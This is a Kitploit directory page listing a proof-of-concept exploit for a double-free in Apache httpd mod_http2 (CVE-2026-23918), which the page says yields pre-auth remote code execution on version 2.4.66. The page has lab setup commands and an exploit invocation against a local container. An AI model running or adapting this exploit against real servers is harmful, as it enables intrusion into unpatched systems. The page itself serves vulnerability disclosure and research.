Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-23918 — Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE. | Kitploit
Tools/GitHubGitHub/striga-ai/cve-2026-23918
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubstriga-ai/cve-2026-23918

CVE-2026-23918

Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE.

View Repository
31644 months agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-23918

Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE.

Affected: httpd 2.4.66 with mod_http2 and multi-threaded MPM (event/worker). Fixed in: 2.4.67.

Found and reported by Bartlomiej Dmitruk (striga.ai) and Stanislaw Strzalkowski (isec.pl).

Writeup: https://striga.ai/research/apache-httpd-mod-http2-double-free

Requirements

  • Docker
  • Python 3

Usage

Build and start the vulnerable environment:

root@kitploit:~
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc

Get system() and scoreboard addresses:

root@kitploit:~
docker exec httpd-poc python3 /getaddr.py 1

Run the exploit:

root@kitploit:~
python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system <system_addr> --scoreboard <scoreboard_addr>

Verify (execution is probabilistic, may take minutes to hours):

root@kitploit:~
docker exec httpd-poc cat /tmp/win

Cleanup

root@kitploit:~
docker rm -f httpd-poc
Download Tool